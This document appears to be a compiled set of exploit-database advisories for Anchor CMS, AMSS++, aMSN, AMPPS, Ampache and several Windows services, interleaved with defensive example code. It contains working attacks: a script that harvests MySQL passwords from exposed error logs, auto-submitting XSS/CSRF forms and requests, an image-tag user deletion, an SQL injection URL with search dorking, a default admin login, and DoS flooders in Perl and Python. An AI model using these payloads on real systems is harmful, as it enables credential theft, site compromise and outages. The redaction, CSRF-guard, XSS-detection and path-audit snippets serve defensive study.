# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-28
# Vendor Homepage: https://andreaelectronics.com/
# Software Link : https://andreaelectronics.com/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
C:\>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: Information disclosure (MySQL password) in error log
# Date: 2/10/2019
# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/releases
# Version: 0.12.3a
# Tested on: Linux
# CVE : CVE-2018-7251
# By default, AnchorCMS logs errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentially sensitive information. Sometimes the AnchorCMS error log contains occurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs, the variables of the MySQL connector class are serialized into a JSON object and logged to the error log.
```python
import re
import sys
import importlib.util  # importlib.util must be imported explicitly; `import importlib` alone does not guarantee it


def get_plain(url):
    # Fetch the URL; 'requests' is imported in __main__ after the availability check below
    try:
        plain_result = requests.get(url=url)
        return plain_result
    except Exception:
        return None


def print_usage():
    print('Usage: {0} <url>'.format(__file__))


if __name__ == '__main__':
    # Ensure we have the URL
    if len(sys.argv) != 2:
        print_usage()
        sys.exit(1)

    print("* Using AnchorCMS website: " + sys.argv[1])
    print("* Trying to import 'requests' module")
    requests_loader = importlib.util.find_spec('requests')
    requests_module_found = requests_loader is not None
    if requests_module_found:
        import requests
    else:
        print("* 'requests' module not found, please install it using pip")
        print("* pip install requests")
        sys.exit(1)

    # The error log lives at a fixed path inside the webroot
    json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
    print("* Trying to get errors.log file at: {}".format(json_url))
    plain_result = get_plain(json_url)
    if plain_result is None:
        print("* URL could not be requested, errors.log is probably not exposed")
        sys.exit(1)

    print("* Found data {}, trying to parse it now".format(plain_result))
    # Every logged error entry carries a "line":N field; count those as entries
    lines = re.findall(r'"line":\d', plain_result.text)
    print("* Found {} error entries".format(len(lines)))
    # The serialized MySQL connector shows up as a JSON array containing a "password" key
    passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)
    print("* Found {} passwords entries".format(len(passwords)))
    for password in passwords:
        print("+ {}".format(password))
```
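The root cause above is that the connector's whole state, password included, is serialized verbatim into a world-readable log. The following is an added example (not AnchorCMS code; the connector class, field names and log format are constructed stand-ins) showing a logging helper that redacts credential-bearing fields before JSON-encoding an object's state, plus the self-check a defender can run over an existing log line.

```python
import json
from typing import Any

# Attribute/key names that must never reach a log file; matched case-insensitively
# as substrings so "password", "db_password" and "MYSQL_PASSWD" are all caught.
SENSITIVE_FIELD_MARKERS = ("password", "passwd", "pwd", "secret", "token", "api_key")
REDACTED = "[REDACTED]"


class MySQLConnector:
    """Constructed stand-in for a DB connector whose attributes get logged on failure."""

    def __init__(self, host: str, user: str, password: str, database: str):
        self.host = host
        self.user = user
        self.password = password
        self.database = database
        self.port = 3306


def is_sensitive(name: str) -> bool:
    lowered = name.lower()
    return any(marker in lowered for marker in SENSITIVE_FIELD_MARKERS)


def redact(value: Any) -> Any:
    """Recursively copy value, replacing the contents of sensitive keys/attributes."""
    if hasattr(value, "__dict__") and not isinstance(value, type):
        value = vars(value)  # object -> its attribute dict
    if isinstance(value, dict):
        return {k: (REDACTED if is_sensitive(str(k)) else redact(v)) for k, v in value.items()}
    if isinstance(value, (list, tuple)):
        return [redact(v) for v in value]
    return value


def format_error_entry(message: str, file: str, line: int, context: Any) -> str:
    """Build one JSON log line; the context (e.g. the connector) is redacted first."""
    entry = {"message": message, "file": file, "line": line, "context": redact(context)}
    return json.dumps(entry, sort_keys=True)


def contains_plaintext_secret(log_line: str, secret: str) -> bool:
    """Check an existing log line for a known secret appearing verbatim."""
    return secret in log_line


if __name__ == "__main__":
    # Constructed sample: a connection failure logged together with the connector's state.
    conn = MySQLConnector("203.0.113.10", "anchor", "hunter2-constructed", "anchor_db")
    line = format_error_entry("Can't connect to MySQL server on '203.0.113.10' (111)",
                              "constructed/connector.php", 42, conn)
    print(line)
    print("leaks password:", contains_plaintext_secret(line, conn.password))
```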
source: https://www.securityfocus.com/bid/53181/info
Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.
Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected.
<html>
<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
</script>
<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="user" value='"><script>alert(1);</script>' />
<input type="hidden" name="pass" value="admin" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="comments" value="1" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="html" value="1" />
<input type="hidden" name="js" value="" />
<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="hidden" name="content" value="Zero Science Lab" />
<input type="hidden" name="slug" value="ZSL" />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
<input type="hidden" name="bio" value="MK" />
<input type="hidden" name="email" value='"><script>alert(3);</script>' />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="role" value="administrator" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="username" value='"><script>alert(2);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="auto_published_comments" value="1" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="home_page" value="1" />
<input type="hidden" name="posts_page" value="1" />
<input type="hidden" name="posts_per_page" value="1" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>
</body></html>
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/admin/
2- Login to admin panel.
3- Press "Posts" button.
4- Write XSS Payload into the description of the post.
5- Press "Save" button.
6- Go to the post.
XSS Payload ==> "><script>alert("XSS")</script>
==> HTTP Request <==
POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close
token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342
###PoC
The CMS performs sensitive actions over GET requests, so a user can be deleted simply by having an administrator load exploit.html:
================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================
Where (21) is the user id.
When the admin opens the exploit.html link, the user with id 21 is deleted.
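A server-side guard for this class of bug, added here as an example and not Anchor CMS code: state-changing admin routes refuse GET (which is all an `<img>` tag can send), and a POST must be same-origin and carry the session's CSRF token in the `token` form field that the Anchor requests above already use. The route prefixes, header handling and the `expected_host` value are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Admin routes that change state; the delete route is the one abused via <img src=...> above.
# Prefixes are relative to the admin root and are an assumption, not Anchor's routing table.
STATE_CHANGING_PREFIXES = ("/admin/users/delete/", "/admin/users/edit/", "/admin/posts/delete/")


def new_csrf_token() -> str:
    """Per-session secret kept server-side and embedded in every admin form."""
    return secrets.token_urlsafe(32)


def same_origin(headers: dict, expected_host: str) -> bool:
    """Prefer the browser's Sec-Fetch-Site verdict; fall back to Origin, then Referer."""
    site = headers.get("Sec-Fetch-Site")
    if site is not None:
        return site in ("same-origin", "none")  # 'none' = user-typed URL or bookmark
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc == expected_host
    return False  # no origin evidence at all: treat as cross-site


def check_state_change(method: str, path: str, headers: dict, form: dict,
                       session_token: str, expected_host: str):
    """Return (allowed, reason). Meant to run before dispatching any /admin/ request."""
    if not path.startswith(STATE_CHANGING_PREFIXES):
        return True, "not a state-changing route"
    if method.upper() != "POST":
        return False, "405 method not allowed: state changes require POST"
    if not same_origin(headers, expected_host):
        return False, "403 cross-site request"
    submitted = form.get("token", "")
    if not submitted or not hmac.compare_digest(submitted, session_token):
        return False, "403 missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    token = new_csrf_token()
    # What the <img> tag in exploit.html produces: a cross-site GET carrying no token.
    print(check_state_change("GET", "/admin/users/delete/21",
                             {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "image"},
                             {}, token, "target"))
    # A legitimate deletion submitted from the admin UI.
    print(check_state_change("POST", "/admin/users/delete/21",
                             {"Origin": "http://target", "Sec-Fetch-Site": "same-origin"},
                             {"token": token}, token, "target"))
```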
# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-10-01
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>
# Description
Exploitation of the vulnerability is shown below:
1-) Enter the admin panel ( vulnerableapplication.com/anchor/admin )
2-) Click the "Create a new post" button on the Posts tab ( from "vulnerableapplication.com/anchor/admin/posts" to "vulnerableapplication.com/anchor/admin/posts/add" )
3-) Enter the payload defined above (<script>prompt("RMG_XSS_PoC")</script>) in the markdown parameter, then click the "Save" button
4-) Finally, return to the home page, where the triggered vulnerability is shown
# Proof of Concepts:
Request;
POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1; _ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1
token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false
Response;
HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105
{"id":"3","notification":"Your new article was created","redirect":"\/anchor\/admin\/posts\/edit\/3"}
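Detection for the three Anchor CMS 0.12.7 stored-XSS reports above (`markdown`, `description` and `js` parameters): an added example, not Anchor CMS code, that decodes the URL-encoded POST body copied from the first PoC request and flags fields whose decoded value carries tag, attribute-breakout, event-handler or javascript: markup. The watched field list and indicator names are my choice; the heuristics are coarse and meant for log review, not as a substitute for output encoding.

```python
import re
from urllib.parse import parse_qs

# Markup that has no business inside a post's title/markdown/description/css/js fields once
# the form body is decoded. Coarse heuristics, tuned for the payloads seen in the reports.
SCRIPT_TAG = re.compile(r"<\s*/?\s*(script|iframe|object|embed|svg|img)\b", re.I)
EVENT_HANDLER = re.compile(r"""(?<=[\s"'/])on[a-z]+\s*=""", re.I)
JS_URL = re.compile(r"javascript\s*:", re.I)
ATTR_BREAKOUT = re.compile(r"""^["']\s*>""")  # leading "> closes the attribute/tag the value lands in

WATCHED_FIELDS = ("title", "markdown", "description", "slug", "css", "js")


def classify_value(value: str) -> list:
    """Names of the indicators that fire on one decoded field value (empty list = clean)."""
    hits = []
    if ATTR_BREAKOUT.search(value):
        hits.append("attribute-breakout")
    if SCRIPT_TAG.search(value):
        hits.append("script-tag")
    if EVENT_HANDLER.search(value):
        hits.append("event-handler")
    if JS_URL.search(value):
        hits.append("javascript-url")
    return hits


def scan_form_body(body: str, watched=WATCHED_FIELDS) -> dict:
    """Decode an application/x-www-form-urlencoded body; return {field: {...}} for suspicious fields."""
    fields = parse_qs(body, keep_blank_values=True)
    findings = {}
    for name in watched:
        for value in fields.get(name, []):
            hits = classify_value(value)
            if hits:
                findings[name] = {"indicators": hits, "value": value}
    return findings


# Body of the "Stored Cross Site Scripting (XSS)" PoC request above, copied from the report.
POC_BODY = (
    "token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test"
    "&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa"
    "&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1"
    "&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false"
)

if __name__ == "__main__":
    for field, info in scan_form_body(POC_BODY).items():
        print(f"{field}: {info['indicators']} <- {info['value']!r}")
```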
# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A
# poc :
[+] Dorking in Google or another search engine.
[+] Use payload : /modules/mail/main/maildetail.php?id=174
[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here
Greetings to: jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm
# Title: AMSS++ 4.7 - Backdoor Admin Account
# Author: indoushka
# Date: 2020-02-23
# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
====================================================================================================================================
poc :
[+] Dorking in Google or another search engine.
[+] Use Login : admin & 1234
[+] http://127.0.0.1/innoobec/index.php
Greetings to: jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm
source: https://www.securityfocus.com/bid/55381/info
aMSN is prone to a remote denial-of-service vulnerability.
A successful exploit of this issue allows remote attackers to crash the affected application, denying service to legitimate users.
```perl
#!/usr/bin/perl
# aMSN remote DoS PoC: repeatedly connects to the file-transfer port (6891),
# sends a run of PNG signature + IHDR chunk headers, and closes the socket.
use strict;
use warnings;
use IO::Socket;

my $x = 0;
print q(
**************************************
* AMSN REMOTE DOS XPL *
* BY *
* Red-Point *
* red-point@odiameporserelite.org *
**************************************
);
print q(Victim IP: );
my $hos = <STDIN>;
chomp($hos);

# The original compared two barewords here (always true); the mode is fixed to "seC0de".
my $type = "seC0de";
if ($type eq "seC0de") {
    while ($x != 9999999) {
        my $sock = IO::Socket::INET->new(
            PeerAddr => $hos,
            PeerPort => "6891",
            Proto    => "tcp",
        );
        die "\nEl host esta fuera de servicio o no estas conectado a internet $!\n" unless $sock;
        # Repeated PNG signature (\x89PNG\r\n\x1a\n) followed by an IHDR chunk length/type
        print $sock "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D".
            "\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00".
            "\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44".
            "\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47".
            "\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00".
            "\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48".
            "\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E".
            "\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A".
            "\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49".
            "\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A".
            "\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D".
            "\x49\x48\x44\x52";
        close($sock);
        syswrite STDOUT, "|";
        $x++;
    }
}
else {
    die " \n";
}
```
# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ampps.com/
# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
# Version: 2.7
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
```python
#!/usr/bin/env python3
# AMPPS 2.7 DoS PoC (ported from the original Python 2 script): opens TCP
# connections to the web server and holds them open until the server or the
# local OS refuses further connections.
import socket

print(r"""
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
AMPPS 2.7
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
""")

Ip = input("[Ip]: ")
Port = 80  # Default port
d = []     # keep every socket referenced so none is garbage-collected and closed
c = 0
while 1:
    try:
        d.append(socket.create_connection((Ip, Port)))
        d[c].send(b"BOOM")
        print("Sie!")
        c += 1
    except socket.error:
        print("Done!")
        input()
        break
```
source: https://www.securityfocus.com/bid/47756/info
Ampache is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ampache 3.5.4 is vulnerable; other versions may also be affected.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/ampache-3.5.4/login.php">
<input type="hidden" name="username" value=""><script>alert(0)</script>" />
</form>
</body>
</html>
#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
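A check for the two unquoted-service-path reports on this page (Andrea ST Filters near the top and the Amiti Antivirus listing just shown), added here as an example and not taken from either advisory: it parses `sc qc` output (English labels plus the Spanish ones in the Andrea listing), decides whether the image path is unquoted, and lists the directories whose write ACLs determine whether the hijack the advisories describe is possible. The label lists and the embedded sample are copied from this page.

```python
import ntpath

# Labels of the relevant lines in `sc qc` output: English, plus the Spanish ones
# shown in the Andrea ST Filters listing on this page.
BINARY_PATH_LABELS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")
SERVICE_NAME_LABELS = ("SERVICE_NAME", "NOMBRE_SERVICIO")


def parse_sc_qc(output: str) -> dict:
    """Pull the service name and image path out of `sc qc <service>` output."""
    info = {}
    for line in output.splitlines():
        label, sep, value = line.partition(":")  # first colon only; the path keeps its "C:"
        if not sep:
            continue
        label, value = label.strip(), value.strip()
        if label in BINARY_PATH_LABELS:
            info["binary_path"] = value
        elif label in SERVICE_NAME_LABELS:
            info["service_name"] = value
    return info


def is_unquoted(image_path: str) -> bool:
    """Vulnerable shape: contains a space and the executable part is not wrapped in quotes."""
    p = image_path.strip()
    return " " in p and not p.startswith('"')


def lookup_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, for an unquoted image path containing spaces:
    each prefix that ends before a space with '.exe' appended, then the full path."""
    p = image_path.strip()
    candidates = [p[:i] + ".exe" for i, ch in enumerate(p) if ch == " "]
    candidates.append(p)
    return candidates


def dirs_to_audit(image_path: str) -> list:
    """Directories whose write ACL must be checked: the parent of every candidate path."""
    return sorted({ntpath.dirname(c) for c in lookup_candidates(image_path)})


def assess(sc_qc_output: str) -> dict:
    info = parse_sc_qc(sc_qc_output)
    path = info.get("binary_path", "")
    vulnerable = is_unquoted(path)
    return {
        "service": info.get("service_name"),
        "unquoted": vulnerable,
        "candidates": lookup_candidates(path) if vulnerable else [],
        "dirs_to_audit": dirs_to_audit(path) if vulnerable else [],
    }


# `sc qc AESTFilters` output copied from the Andrea ST Filters report on this page.
ANDREA_SC_QC = r"""
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
"""

if __name__ == "__main__":
    print(assess(ANDREA_SC_QC))
```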
# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation
# Date: 2021-08-06
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://gestionaleamica.com - https://www.bisanziosoftware.com
# Software Link: https://gestionaleamica.com/Download/AmicaProdigySetup.exe
# Version: 1.7
# Tested on: Windows 10 Pro 20H2 x64
# CVE: CVE-2021-35312
Amica Prodigy is a backup solution from Amica software (GestionaleAmica: invoices, accounting, etc.,
from the website gestionaleamica.com), a CIR 2000 srl / Bisanzio Software srl product.
A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy executable
"RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges at the scheduled time.
C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe
C:\AmicaProdigy\RemoteBackup.Service.exe NT AUTHORITY\Authenticated Users:(I)(M)
                                         NT AUTHORITY\SYSTEM:(I)(F)
